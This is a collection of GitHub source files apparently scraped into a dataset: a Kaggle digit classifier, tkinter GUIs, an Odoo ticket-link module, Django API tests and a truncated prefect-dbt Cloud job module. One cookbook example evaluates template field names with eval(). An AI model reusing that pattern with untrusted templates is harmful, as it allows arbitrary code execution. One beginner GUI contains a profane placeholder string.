e\nimport read_dataset as rd\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.neural_network import BernoulliRBM\nfrom sklearn.ensemble import RandomForestClassifier\n\ndef evaluate_parameters():\n X,y = get_train_data(limit=25)\n\n scores = []\n scores_std = 
[]\n\n print('Start learning...')\n forests = [70]\n rbm_components = [1100]\n rbm_learning_rate = [0.06]\n rbm_n_iter = [20]\n\n it = itertools.product(forests,rbm_components,rbm_learning_rate,rbm_n_iter)\n\n for (trees,components,learning_rate,n_iter) in it:\n classifier = get_classifier(trees,components,learning_rate,n_iter)\n name = \"plots_pipeline/pipeline_{}.png\".format(trees)\n e.evaluate_classifier(classifier,X,y, name=name)\n\ndef submission(trees=70,components=1100,learning_rate=0.06,n_iter=20):\n X,y,test_X = get_train_and_test_data()\n\n print(\"Defining classifiers\")\n classifier = get_classifier(trees,components,learning_rate,n_iter)\n print(\"Training classifier\")\n classifier.fit(X,y)\n predictions = classifier.predict(test_X)\n\n #Most submitions are cute with a CSV. Might as well learn how to do it.\n pd.DataFrame({\"ImageId\": range(1,len(predictions)+1), \"Label\": predictions}).to_csv('submit_rbm.csv', index=False, header=True)\n\ndef get_classifier(trees,components,learning_rate,n_iter):\n rbm = BernoulliRBM(verbose=True,n_components=components,\n n_iter=n_iter,learning_rate=learning_rate)\n random_forest = RandomForestClassifier(trees)\n return Pipeline(steps=[('rbm',rbm), ('forest',random_forest)])\n\ndef scale(X):\n return (X - np.min(X, 0)) / (np.max(X, 0) + 0.0001) # 0-1 scaling\n\ndef get_train_data(limit=-1):\n print('Loading train data')\n X,y = rd.read_train(limit=limit)\n print('Augmenting data set')\n X,y = rd.nudge_dataset(X,y)\n print('Scaling data')\n X = scale(X)\n return X,y\n\ndef get_train_and_test_data(train_limit=-1,test_limit=-1):\n X,y = get_train_data(train_limit)\n print('Loading test data')\n test_X = rd.read_test(limit=test_limit)\n test_X = scale(test_X)\n return X,y,test_X\n\n#evaluate_parameters()\nsubmission()\n","repo_name":"costapt/kaggle_digit_recognizer","sub_path":"rbm_with_random_forest.py","file_name":"rbm_with_random_forest.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"34384548400","text":"import string\n\nclass TemplateFormatter(string.Formatter):\n def get_field(self, field_name, args, kwargs):\n if field_name.startswith(\"$\"):\n code = field_name[1:]\n val = eval(code, {}, dict(kwargs))\n return val, field_name\n else:\n return super(TemplateFormatter, self).get_field(field_name, args, kwargs)\nmessages = ['Message 1', 'Message 2']\n\ntmpl = TemplateFormatter()\ntxt = tmpl.format(\"Hello {name}, \"\n \"You have {$len(messages)} message{$len(messages) and 's'}:\\n{$'\\\\n'.join(messages)}\",\n name='Alessandro', messages=messages)\nprint(txt)\n","repo_name":"PacktPublishing/Modern-Python-Standard-Library-Cookbook","sub_path":"Chapter02/text_04.py","file_name":"text_04.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":85,"dataset":"github-code","pt":"16"} +{"seq_id":"20800201828","text":"import tkinter\nimport CustomerLoginWindow\nimport colorfile\nfrom databases import StockDatabase, CustomerDatabase, StaffDatabase, BasketDatabase, OrderDatabase\nfrom staffViews.stockManager import StockManager\nfrom staffViews.staffManager import StaffManager\nfrom staffViews.custManager import CustomerManager\nfrom staffViews.orderManager import OrderManager\n\nclass StaffPortal:\n def __init__(self, db:StockDatabase.StockDatabase,customerdb:CustomerDatabase.CustomerDB,staffdb:StaffDatabase.StaffDB, bdb:BasketDatabase.BasketDatabase, odb:OrderDatabase.OrderDatabase, 
closeFn):\n #Public vars\n self.db = db\n self.customerdb = customerdb\n self.staffdb = staffdb\n self.basketdb = bdb\n self.orderdb = odb\n self.closeFn = closeFn\n #Window Builder\n self.root = tkinter.Toplevel()\n self.root.protocol(\"WM_DELETE_WINDOW\", self.HandleClose) #Captures the close event to close it properly\n self.root.title(\"BuildrightDB\")\n self.root.geometry(\"900x450\")\n self.DrawWidgets()\n\n self.root.mainloop()\n\n def DrawWidgets(self):\n #Header Frame\n self.headerFrame = tkinter.Frame(self.root, bg=colorfile.topbarcolor)\n self.headerFrame.place(x=0,y=0,width=900,height=64)\n self.titleLabel = tkinter.Label(self.headerFrame, text=\"Staff Portal\", font=\"default 32 normal\", anchor=\"w\", bg=colorfile.topbarcolor)\n self.titleLabel.place(x=8,y=8,width=400,height=48)\n\n #Stock Management\n self.stockViewButton = tkinter.Button(self.root, text=\"Stock Management\", command=lambda:self.ViewStock())\n self.stockViewButton.place(x=8,y=100,width=438,height=125)\n\n #Staff Management\n self.staffViewButton = tkinter.Button(self.root, text=\"Staff Management\", command=lambda:self.ViewStaff())\n self.staffViewButton.place(x=454,y=100,width=438,height=125)\n\n #Customer Management\n self.customerViewButton = tkinter.Button(self.root, text=\"Customer Management\", command=lambda:self.ViewCustomer())\n self.customerViewButton.place(x=8,y=233,width=438,height=125)\n\n #Order Management\n self.orderViewButton = tkinter.Button(self.root, text=\"Order Management\", command=lambda:self.ViewOrder())\n self.orderViewButton.place(x=454,y=233,width=438,height=125)\n\n def HandleClose(self):\n #print(\"Closing!\")\n self.root.quit()\n self.root.destroy()\n self.closeFn()\n\n def ViewStock(self):\n stockmm = StockManager.StockManager(self.db)\n\n def ViewStaff(self):\n staffm = StaffManager.StaffManager(self.staffdb)\n \n def ViewCustomer(self):\n cman = CustomerManager.CustomerManager(self.customerdb)\n\n def ViewOrder(self):\n oman = OrderManager.OrderManager(self.orderdb, self.customerdb, self.db)","repo_name":"jasonthehuman05/CompSciCoursework","sub_path":"CourseworkMainProgramming/StaffPortal.py","file_name":"StaffPortal.py","file_ext":"py","file_size_in_byte":2826,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"43681037952","text":"# -*- coding: utf-8 -*-\n\nfrom openerp import models, fields, api, _\n\n\nclass LinkType(models.Model):\n \"\"\"Type of a link.\n \"\"\"\n _name = 'anytracker.link.type'\n _description = \"Link type\"\n _order = 'name'\n\n name = fields.Char(\n _(\"name\"),\n size=64,\n required=True,\n translate=True)\n description = fields.Text(\n _('Description'),\n translate=True)\n\n\nclass Link(models.Model):\n \"\"\"The link is used to link 2 tickets.\n For example it is useful to link use case ticket with few technical ticket\n A ticket can be present in several links.\n \"\"\"\n _name = 'anytracker.link'\n _description = \"Link between two tickets\"\n\n @api.one\n @api.depends('ticket_two', 'ticket_one')\n @api.onchange('ticket_two', 'ticket_one')\n def _data_tickets(self):\n # This function is used for ticket view\n # to display the list of active ticket links\n # In the link, the active ticket can be ticket_one or ticket_two,\n # the goal is to display the ticket is not active ticket\n\n for link in self:\n if self.env.context.get('active_id'):\n active_id = self.env.context['active_id']\n if link.ticket_one:\n if link.ticket_one.id != active_id:\n link.name = link.ticket_one.name\n 
link.number = link.ticket_one.number\n link.stage = link.ticket_one.stage_id.name\n link.progress = link.ticket_one.progress\n\n if link.ticket_two:\n if link.ticket_two.id != active_id:\n link.name = link.ticket_two.name\n link.number = link.ticket_two.number\n link.stage = link.ticket_two.stage_id.name\n link.progress = link.ticket_two.progress\n else:\n link.name = False\n link.number = False\n link.stage = False\n link.progress = False\n\n ticket_one = fields.Many2one(\n 'anytracker.ticket',\n 'Ticket one',\n required=True,\n ondelete='cascade')\n ticket_two = fields.Many2one(\n 'anytracker.ticket',\n 'Ticket two',\n required=True,\n ondelete='cascade')\n\n linktype_id = fields.Many2one(\n 'anytracker.link.type',\n 'Type Link',\n required=True,\n ondelete='cascade')\n name = fields.Char(compute='_data_tickets', string=\"\")\n number = fields.Char(compute='_data_tickets', string=\"\")\n progress = fields.Float(compute='_data_tickets', string=\"\")\n stage = fields.Char(compute='_data_tickets', string=\"\")\n\n @api.multi\n def name_get(self):\n \"\"\" set a displaying to better represent link between two tickets \"\"\"\n\n result = []\n\n for link in self:\n diaplay_value = \"{} <-> {}\".format(\n link.ticket_one.number, link.ticket_two.number)\n result.append((link.id, diaplay_value))\n\n return result\n\n def return_action_ticket(self):\n return {\n 'type': 'ir.actions.client',\n 'tag': 'reload',\n 'name': 'Ticket',\n 'res_model': 'anytracker.ticket',\n 'view_type': 'tree',\n 'view_mode': 'tree',\n 'target': 'current',\n 'nodestroy': True,\n }\n\n @api.multi\n def action_delete_link(self):\n # FIXME - Is there no verification to be done before deleting a link?\n self.unlink()\n return self.return_action_ticket()\n\n @api.multi\n def action_open_link(self):\n\n # This will make sure we have on record, not multiple records.\n self.ensure_one()\n\n return {\n 'name': self.name,\n 'res_model': 'anytracker.link',\n 'res_id': self.id,\n 'type': 'ir.actions.act_window',\n 'context': {},\n 'view_mode': 'form',\n 'view_type': 'form',\n 'target': 'new',\n 'flags': {'form': {'action_buttons': True}}\n\n }\n\n\nclass Ticket(models.Model):\n \"\"\" Add links\n \"\"\"\n _inherit = 'anytracker.ticket'\n\n @api.one\n def _getAllLink(self):\n LINK_MODEL = self.env['anytracker.link']\n for ticket in self:\n ticket.all_links = LINK_MODEL.search(\n ['|', ('ticket_two', '=', ticket.id),\n ('ticket_one', '=', ticket.id)])\n\n @api.multi\n def action_add_link(self):\n\n # This will make sure we have on record, not multiple records.\n self.ensure_one()\n\n # template = self.env.ref('account.email_template_edi_invoice', False)\n return {\n 'name': \"add new link\",\n 'res_model': 'anytracker.link',\n # 'res_id': self.id,\n 'type': 'ir.actions.act_window',\n 'view_mode': 'form',\n 'view_type': 'form',\n 'context': {'default_ticket_one': self.id},\n # 'view_id': self.env.ref('view_prod_order_form'),\n 'target': 'new', # 'target': 'current',\n 'flags': {'form': {'action_buttons': True}}\n\n }\n\n link_ids = fields.One2many(\n 'anytracker.link',\n 'ticket_one',\n 'Links',\n copy=True,\n help=\"The tickets linked to this tickets\")\n all_links = fields.One2many(\n 'anytracker.link',\n string=\"links\",\n compute='_getAllLink')\n","repo_name":"anybox/anytracker","sub_path":"anytracker/link/link.py","file_name":"link.py","file_ext":"py","file_size_in_byte":5450,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"40350522053","text":"\"\"\"\nThis is a 
test\n\"\"\"\n#-----------------------------------------------------------------------\nfrom tkinter import *\n#-----------------------------------------------------------------------\n\n# Window Declaration\nroot = Tk(className=\"Ben's Window\")\n\n# Button Functionality\ndef myClick():\n myClick = Label(root, text=\"!!!Poop Alert!!!\").pack()\n searchBox = Label(root, text=\"Input: \" + search.get()).pack()\n\n\n# Labels\nmyLabel = Label(root, text=\"Hello Ben!\")\nmyLabel2 = Label(root, text=\"I hope you are having a wonderful day!\")\n# Buttons\nmyButton = Button(root, text=\"Do Not Press!\", padx=100, pady=100, command=myClick, fg=\"white\", bg=\"red\")\nsearch = Entry(root, fg=\"black\", bg=\"light blue\", width=25, borderwidth=5)\n\n# Pack it in\nmyLabel.pack()\nmyLabel2.pack()\nsearch.pack()\nsearch.insert(0, \"Fuck you!\")\nmyButton.pack()\n\nroot.mainloop()","repo_name":"BenRosentha1/Beginner-Projects","sub_path":"GUI Shit/guiTest.py","file_name":"guiTest.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"39232229680","text":"\"\"\"Tests for Ingredients API.\"\"\"\nfrom django.contrib.auth import get_user_model\nfrom django.urls import reverse\nfrom django.test import TestCase\n\nfrom rest_framework import status\nfrom rest_framework.test import APIClient\n\nfrom core.models import Ingredient\nfrom recipe.serializers import IngredientSerializer\n\nINGREDIENTS_URL = reverse('recipe:ingredient-list')\n\n\ndef detail_url(ingredient_id):\n \"\"\"Create and return an ingredient URL\"\"\"\n return reverse('recipe:ingredient-detail', args=[ingredient_id])\n\n\ndef create_user(email='test@example.com', password='testpass123'):\n \"\"\"Create and return new user.\"\"\"\n return get_user_model().objects.create(email=email, password=password)\n\n\nclass PublicIngredientsApiTests(TestCase):\n \"\"\"Tests unauthenticated API requests.\"\"\"\n\n def setUp(self) -> None:\n self.client = APIClient()\n\n def test_auth_required(self):\n \"\"\"Tests auth is required for retrieving ingredients.\"\"\"\n res = self.client.get(INGREDIENTS_URL)\n\n self.assertEqual(res.status_code, status.HTTP_401_UNAUTHORIZED)\n\n\nclass PrivateIngredientsApiTests(TestCase):\n \"\"\"Tests authenticated API requests.\"\"\"\n\n def setUp(self) -> None:\n self.client = APIClient()\n # Create user and login\n self.user = create_user()\n self.client.force_authenticate(self.user)\n\n def test_auth_required(self):\n \"\"\"Tests auth is required for retrieving ingredients.\"\"\"\n # Create dummy data\n Ingredient.objects.create(user=self.user, name='Parsley')\n Ingredient.objects.create(user=self.user, name='Beef')\n\n # Send GET request\n res = self.client.get(INGREDIENTS_URL)\n\n # Check response\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n\n # Query db for data and order by name\n ingredients = Ingredient.objects.all().order_by('-name')\n # Serialize to simulate API\n serialized = IngredientSerializer(ingredients, many=True)\n\n self.assertEqual(ingredients.count(), 2)\n self.assertEqual(res.data, serialized.data)\n\n def test_ingredients_limited_to_user(self):\n \"\"\"Tests list of ingredients is limited to authenticated user\"\"\"\n # Create secondary user\n new_user = create_user(email='test2@example.com',\n password='testpass231')\n # Create ingredients\n ingredient = Ingredient.objects.create(user=self.user, name='Parsley')\n Ingredient.objects.create(user=new_user, name='Beef')\n\n # Send GET request\n 
res = self.client.get(INGREDIENTS_URL)\n\n # Assert response is OK\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n\n # Query db\n ingredients = Ingredient.objects.filter(user=self.user)\n # serialize data\n serialized = IngredientSerializer(ingredients, many=True)\n # Assert received same as db\n self.assertEqual(len(res.data), 1)\n self.assertEqual(res.data, serialized.data)\n\n def test_update_ingredient(self):\n \"\"\"Test updating an ingredient.\"\"\"\n # Create ingredient\n ingredient = Ingredient.objects.create(user=self.user, name='Bread')\n # Prepare for API call\n payload = {\n 'name': 'Breadcrumbs'\n }\n url = detail_url(ingredient.id)\n # Send PATCH request\n res = self.client.patch(url, payload)\n\n # Assert response OK\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n\n # Refresh ingredient details from db\n ingredient.refresh_from_db()\n # Assert name has been changed\n self.assertEqual(ingredient.name, payload['name'])\n\n def test_delete_ingredient(self):\n \"\"\"Test deleting an ingredient.\"\"\"\n # Create ingredient\n ingredient = Ingredient.objects.create(user=self.user, name='Bread')\n # Build url for API call\n url = detail_url(ingredient.id)\n # Send DELETE request\n res = self.client.delete(url)\n\n # Assert response code OK\n self.assertEqual(res.status_code, status.HTTP_204_NO_CONTENT)\n\n # Assert that no ingredient exists\n ingredients = Ingredient.objects.filter(user=self.user)\n self.assertFalse(ingredients.exists())\n","repo_name":"dmawardi/recipe-app-api","sub_path":"app/recipe/tests/test_ingredients_api.py","file_name":"test_ingredients_api.py","file_ext":"py","file_size_in_byte":4246,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"42838389886","text":"\"\"\"Module containing tasks and flows for interacting with dbt Cloud jobs\"\"\"\nimport asyncio\nimport shlex\nimport time\nfrom json import JSONDecodeError\nfrom typing import Any, Awaitable, Callable, Dict, List, Optional, Union\n\nfrom httpx import HTTPStatusError\nfrom prefect import flow, get_run_logger, task\nfrom prefect.blocks.abstract import JobBlock, JobRun\nfrom prefect.context import FlowRunContext\nfrom prefect.utilities.asyncutils import sync_compatible\nfrom pydantic import VERSION as PYDANTIC_VERSION\n\nif PYDANTIC_VERSION.startswith(\"2.\"):\n from pydantic.v1 import Field\nelse:\n from pydantic import Field\n\nfrom typing_extensions import Literal\n\nfrom prefect_dbt.cloud.credentials import DbtCloudCredentials\nfrom prefect_dbt.cloud.exceptions import (\n DbtCloudGetJobFailed,\n DbtCloudGetRunArtifactFailed,\n DbtCloudGetRunFailed,\n DbtCloudJobRunCancelled,\n DbtCloudJobRunFailed,\n DbtCloudJobRunIncomplete,\n DbtCloudJobRunTimedOut,\n DbtCloudJobRunTriggerFailed,\n DbtCloudListRunArtifactsFailed,\n)\nfrom prefect_dbt.cloud.models import TriggerJobRunOptions\nfrom prefect_dbt.cloud.runs import (\n DbtCloudJobRunStatus,\n get_dbt_cloud_run_artifact,\n get_dbt_cloud_run_info,\n list_dbt_cloud_run_artifacts,\n wait_for_dbt_cloud_job_run,\n)\nfrom prefect_dbt.cloud.utils import extract_user_message\n\nEXE_COMMANDS = (\"build\", \"run\", \"test\", \"seed\", \"snapshot\")\n\n\n@task(\n name=\"Get dbt Cloud job details\",\n description=\"Retrieves details of a dbt Cloud job \"\n \"for the job with the given job_id.\",\n retries=3,\n retry_delay_seconds=10,\n)\nasync def get_dbt_cloud_job_info(\n dbt_cloud_credentials: DbtCloudCredentials,\n job_id: int,\n order_by: Optional[str] = None,\n) -> Dict:\n \"\"\"\n A 
task to retrieve information about a dbt Cloud job.\n\n Args:\n dbt_cloud_credentials: Credentials for authenticating with dbt Cloud.\n job_id: The ID of the job to get.\n\n Returns:\n The job data returned by the dbt Cloud administrative API.\n\n Example:\n Get status of a dbt Cloud job:\n ```python\n from prefect import flow\n\n from prefect_dbt.cloud import DbtCloudCredentials\n from prefect_dbt.cloud.jobs import get_job\n\n @flow\n def get_job_flow():\n credentials = DbtCloudCredentials(api_key=\"my_api_key\", account_id=123456789)\n\n return get_job(\n dbt_cloud_credentials=credentials,\n job_id=42\n )\n\n get_job_flow()\n ```\n \"\"\" # noqa\n try:\n async with dbt_cloud_credentials.get_administrative_client() as client:\n response = await client.get_job(\n job_id=job_id,\n order_by=order_by,\n )\n except HTTPStatusError as ex:\n raise DbtCloudGetJobFailed(extract_user_message(ex)) from ex\n return response.json()[\"data\"]\n\n\n@task(\n name=\"Trigger dbt Cloud job run\",\n description=\"Triggers a dbt Cloud job run for the job \"\n \"with the given job_id and optional overrides.\",\n retries=3,\n retry_delay_seconds=10,\n)\nasync def trigger_dbt_cloud_job_run(\n dbt_cloud_credentials: DbtCloudCredentials,\n job_id: int,\n options: Optional[TriggerJobRunOptions] = None,\n) -> Dict:\n \"\"\"\n A task to trigger a dbt Cloud job run.\n\n Args:\n dbt_cloud_credentials: Credentials for authenticating with dbt Cloud.\n job_id: The ID of the job to trigger.\n options: An optional TriggerJobRunOptions instance to specify overrides\n for the triggered job run.\n\n Returns:\n The run data returned from the dbt Cloud administrative API.\n\n Examples:\n Trigger a dbt Cloud job run:\n ```python\n from prefect import flow\n\n from prefect_dbt.cloud import DbtCloudCredentials\n from prefect_dbt.cloud.jobs import trigger_dbt_cloud_job_run\n\n\n @flow\n def trigger_dbt_cloud_job_run_flow():\n credentials = DbtCloudCredentials(api_key=\"my_api_key\", account_id=123456789)\n\n trigger_dbt_cloud_job_run(dbt_cloud_credentials=credentials, job_id=1)\n\n\n trigger_dbt_cloud_job_run_flow()\n ```\n\n Trigger a dbt Cloud job run with overrides:\n ```python\n from prefect import flow\n\n from prefect_dbt.cloud import DbtCloudCredentials\n from prefect_dbt.cloud.jobs import trigger_dbt_cloud_job_run\n from prefect_dbt.cloud.models import TriggerJobRunOptions\n\n\n @flow\n def trigger_dbt_cloud_job_run_flow():\n credentials = DbtCloudCredentials(api_key=\"my_api_key\", account_id=123456789)\n\n trigger_dbt_cloud_job_run(\n dbt_cloud_credentials=credentials,\n job_id=1,\n options=TriggerJobRunOptions(\n git_branch=\"staging\",\n schema_override=\"dbt_cloud_pr_123\",\n dbt_version_override=\"0.18.0\",\n target_name_override=\"staging\",\n timeout_seconds_override=3000,\n generate_docs_override=True,\n threads_override=8,\n steps_override=[\n \"dbt seed\",\n \"dbt run --fail-fast\",\n \"dbt test --fail-fast\",\n ],\n ),\n )\n\n\n trigger_dbt_cloud_job_run()\n ```\n \"\"\" # noqa\n logger = get_run_logger()\n\n logger.info(f\"Triggering run for job with ID {job_id}\")\n\n try:\n async with dbt_cloud_credentials.get_administrative_client() as client:\n response = await client.trigger_job_run(job_id=job_id, options=options)\n except HTTPStatusError as ex:\n raise DbtCloudJobRunTriggerFailed(extract_user_message(ex)) from ex\n\n run_data = response.json()[\"data\"]\n\n if \"project_id\" in run_data and \"id\" in run_data:\n logger.info(\n f\"Run successfully triggered for job with ID {job_id}. 
\"\n \"You can view the status of this run at \"\n f\"https://{dbt_cloud_credentials.domain}/#/accounts/\"\n f\"{dbt_cloud_credentials.account_id}/projects/{run_data['project_id']}/\"\n f\"runs/{run_data['id']}/\"\n )\n\n return run_data\n\n\n@task(\n name=\"Get dbt Cloud job run ID\",\n description=\"Extracts the run ID from a trigger job run API response\",\n)\ndef get_run_id(obj: Dict):\n \"\"\"\n Task that extracts the run ID from a trigger job run API response,\n\n This task is mainly used to maintain dependency tracking between the\n `trigger_dbt_cloud_job_run` task and downstream tasks/flows that use the run ID.\n\n Args:\n obj: The JSON body from the trigger job run response.\n\n Example:\n ```python\n from prefect import flow\n from prefect_dbt.cloud import DbtCloudCredentials\n from prefect_dbt.cloud.jobs import trigger_dbt_cloud_job_run, get_run_id\n\n\n @flow\n def trigger_run_and_get_id():\n dbt_cloud_credentials=DbtCloudCredentials(\n api_key=\"my_api_key\",\n account_id=123456789\n )\n\n triggered_run_data = trigger_dbt_cloud_job_run(\n dbt_cloud_credentials=dbt_cloud_credentials,\n job_id=job_id,\n options=trigger_job_run_options,\n )\n run_id = get_run_id.submit(triggered_run_data)\n return run_id\n\n trigger_run_and_get_id()\n ```\n \"\"\"\n id = obj.get(\"id\")\n if id is None:\n raise RuntimeError(\"Unable to determine run ID for triggered job.\")\n return id\n\n\n@flow(\n name=\"Trigger dbt Cloud job run and wait for completion\",\n description=\"Triggers a dbt Cloud job run and waits for the\"\n \"triggered run to complete.\",\n)\nasync def trigger_dbt_cloud_job_run_and_wait_for_completion(\n dbt_cloud_credentials: DbtCloudCredentials,\n job_id: int,\n trigger_job_run_options: Optional[TriggerJobRunOptions] = None,\n max_wait_seconds: int = 900,\n poll_frequency_seconds: int = 10,\n retry_filtered_models_attempts: int = 3,\n) -> Dict:\n \"\"\"\n Flow that triggers a job run and waits for the triggered run to complete.\n\n Args:\n dbt_cloud_credentials: Credentials for authenticating with dbt Cloud.\n job_id: The ID of the job to trigger.\n trigger_job_run_options: An optional TriggerJobRunOptions instance to\n specify overrides for the triggered job run.\n max_wait_seconds: Maximum number of seconds to wait for job to complete\n poll_frequency_seconds: Number of seconds to wait in between checks for\n run completion.\n retry_filtered_models_attempts: Number of times to retry models selected by `retry_status_filters`.\n\n Raises:\n DbtCloudJobRunCancelled: The triggered dbt Cloud job run was cancelled.\n DbtCloudJobRunFailed: The triggered dbt Cloud job run failed.\n RuntimeError: The triggered dbt Cloud job run ended in an unexpected state.\n\n Returns:\n The run data returned by the dbt Cloud administrative API.\n\n Examples:\n Trigger a dbt Cloud job and wait for completion as a stand alone flow:\n ```python\n import asyncio\n from prefect_dbt.cloud import DbtCloudCredentials\n from prefect_dbt.cloud.jobs import trigger_dbt_cloud_job_run_and_wait_for_completion\n\n asyncio.run(\n trigger_dbt_cloud_job_run_and_wait_for_completion(\n dbt_cloud_credentials=DbtCloudCredentials(\n api_key=\"my_api_key\",\n account_id=123456789\n ),\n job_id=1\n )\n )\n ```\n\n Trigger a dbt Cloud job and wait for completion as a sub-flow:\n ```python\n from prefect import flow\n from prefect_dbt.cloud import DbtCloudCredentials\n from prefect_dbt.cloud.jobs import trigger_dbt_cloud_job_run_and_wait_for_completion\n\n @flow\n def my_flow():\n ...\n run_result = 
trigger_dbt_cloud_job_run_and_wait_for_completion(\n dbt_cloud_credentials=DbtCloudCredentials(\n api_key=\"my_api_key\",\n account_id=123456789\n ),\n job_id=1\n )\n ...\n\n my_flow()\n ```\n\n Trigger a dbt Cloud job with overrides:\n ```python\n import asyncio\n from prefect_dbt.cloud import DbtCloudCredentials\n from prefect_dbt.cloud.jobs import trigger_dbt_cloud_job_run_and_wait_for_completion\n from prefect_dbt.cloud.models import TriggerJobRunOptions\n\n asyncio.run(\n trigger_dbt_cloud_job_run_and_wait_for_completion(\n dbt_cloud_credentials=DbtCloudCredentials(\n api_key=\"my_api_key\",\n account_id=123456789\n ),\n job_id=1,\n trigger_job_run_options=TriggerJobRunOptions(\n git_branch=\"staging\",\n schema_override=\"dbt_cloud_pr_123\",\n dbt_version_override=\"0.18.0\",\n target_name_override=\"staging\",\n timeout_seconds_override=3000,\n generate_docs_override=True,\n threads_override=8,\n steps_override=[\n \"dbt seed\",\n \"dbt run --fail-fast\",\n \"dbt test --fail fast\",\n ],\n ),\n )\n )\n ```\n \"\"\" # noqa\n logger = get_run_logger()\n\n triggered_run_data_future = await trigger_dbt_cloud_job_run.submit(\n dbt_cloud_credentials=dbt_cloud_credentials,\n job_id=job_id,\n options=trigger_job_run_options,\n )\n run_id = (await triggered_run_data_future.result()).get(\"id\")\n if run_id is None:\n raise RuntimeError(\"Unable to determine run ID for triggered job.\")\n\n final_run_status, run_data = await wait_for_dbt_cloud_job_run(\n run_id=run_id,\n dbt_cloud_credentials=dbt_cloud_credentials,\n max_wait_seconds=max_wait_seconds,\n poll_frequency_seconds=poll_frequency_seconds,\n )\n\n if final_run_status == DbtCloudJobRunStatus.SUCCESS:\n try:\n list_run_artifacts_future = await list_dbt_cloud_run_artifacts.submit(\n dbt_cloud_credentials=dbt_cloud_credentials,\n run_id=run_id,\n )\n run_data[\"artifact_paths\"] = await list_run_artifacts_future.result()\n except DbtCloudListRunArtifactsFailed as ex:\n logger.warning(\n \"Unable to retrieve artifacts for job run with ID %s. 
Reason: %s\",\n run_id,\n ex,\n )\n logger.info(\n \"dbt Cloud job run with ID %s completed successfully!\",\n run_id,\n )\n return run_data\n elif final_run_status == DbtCloudJobRunStatus.CANCELLED:\n raise DbtCloudJobRunCancelled(\n f\"Triggered job run with ID {run_id} was cancelled.\"\n )\n elif final_run_status == DbtCloudJobRunStatus.FAILED:\n while retry_filtered_models_attempts > 0:\n logger.info(\n f\"Retrying job run with ID: {run_id} \"\n f\"{retry_filtered_models_attempts} more times\"\n )\n try:\n retry_filtered_models_attempts -= 1\n run_data = await (\n retry_dbt_cloud_job_run_subset_and_wait_for_completion(\n dbt_cloud_credentials=dbt_cloud_credentials,\n run_id=run_id,\n trigger_job_run_options=trigger_job_run_options,\n max_wait_seconds=max_wait_seconds,\n poll_frequency_seconds=poll_frequency_seconds,\n )\n )\n return run_data\n except Exception:\n pass\n else:\n raise DbtCloudJobRunFailed(f\"Triggered job run with ID: {run_id} failed.\")\n else:\n raise RuntimeError(\n f\"Triggered job run with ID: {run_id} ended with unexpected\"\n f\"status {final_run_status.value}.\"\n )\n\n\nasync def _build_trigger_job_run_options(\n dbt_cloud_credentials: DbtCloudCredentials,\n trigger_job_run_options: TriggerJobRunOptions,\n run_id: str,\n run_info: Dict[str, Any],\n job_info: Dict[str, Any],\n):\n \"\"\"\n Compiles a list of steps (commands) to retry, then either build trigger job\n run options from scratch if it does not exist, else overrides the existing.\n \"\"\"\n generate_docs = job_info.get(\"generate_docs\", False)\n generate_sources = job_info.get(\"generate_sources\", False)\n\n steps_override = []\n for run_step in run_info[\"run_steps\"]:\n status = run_step[\"status_humanized\"].lower()\n # Skipping cloning, profile setup, and dbt deps - always the first three\n # steps in any run, and note, index starts at 1 instead of 0\n if run_step[\"index\"] <= 3 or status == \"success\":\n continue\n # get dbt build from \"Invoke dbt with `dbt build`\"\n command = run_step[\"name\"].partition(\"`\")[2].partition(\"`\")[0]\n\n # These steps will be re-run regardless if\n # generate_docs or generate_sources are enabled for a given job\n # so if we don't skip, it'll run twice\n freshness_in_command = (\n \"dbt source snapshot-freshness\" in command\n or \"dbt source freshness\" in command\n )\n if \"dbt docs generate\" in command and generate_docs:\n continue\n elif freshness_in_command and generate_sources:\n continue\n\n # find an executable command like `build` or `run`\n # search in a list so that there aren't false positives, like\n # `\"run\" in \"dbt run-operation\"`, which is True; we actually want\n # `\"run\" in [\"dbt\", \"run-operation\"]` which is False\n command_components = shlex.split(command)\n for exe_command in EXE_COMMANDS:\n if exe_command in command_components:\n break\n else:\n exe_command = \"\"\n\n is_exe_command = exe_command in EXE_COMMANDS\n is_not_success = status in (\"error\", \"skipped\", \"cancelled\")\n is_skipped = status == \"skipped\"\n if (not is_exe_command and is_not_success) or (is_exe_command and is_skipped):\n # if no matches like `run-operation`, we will be rerunning entirely\n # or if it's one of the expected commands and is skipped\n steps_override.append(command)\n else:\n # errors and failures are when we need to inspect to figure\n # out the point of failure\n try:\n run_artifact_future = await get_dbt_cloud_run_artifact.with_options(\n retries=0, retry_delay_seconds=0\n ).submit(\n dbt_cloud_credentials=dbt_cloud_credentials,\n 
run_id=run_id,\n path=\"run_results.json\",\n step=run_step[\"index\"],\n )\n run_artifact = await run_artifact_future.result()\n except JSONDecodeError:\n # get the run results scoped to the step which had an error\n # an error here indicates that either:\n # 1) the fail-fast flag was set, in which case\n # the run_results.json file was never created; or\n # 2) there was a problem on dbt Cloud's side saving\n # this artifact\n steps_override.append(command)\n else:\n # we only need to find the individual nodes for those run commands\n run_results = run_artifact[\"results\"]\n # select nodes that were not successful\n # note \"fail\" here instead of \"cancelled\" because\n # nodes do not have a cancelled state\n run_nodes = \" \".join(\n run_result[\"unique_id\"].split(\".\")[2]\n for run_result in run_results\n if run_result[\"status\"] in (\"error\", \"skipped\", \"fail\")\n )\n\n select_arg = None\n if \"-s\" in command_components:\n select_arg = \"-s\"\n elif \"--select\" in command_components:\n select_arg = \"--select\"\n\n # prevent duplicate --select/-s statements\n if select_arg is not None:\n # dbt --fail-fast run, -s, bad_mod --vars '{\"env\": \"prod\"}' to:\n # dbt --fail-fast run -s other_mod bad_mod --vars '{\"env\": \"prod\"}'\n command_start, select_arg, command_end = command.partition(\n select_arg\n )\n modified_command = (\n 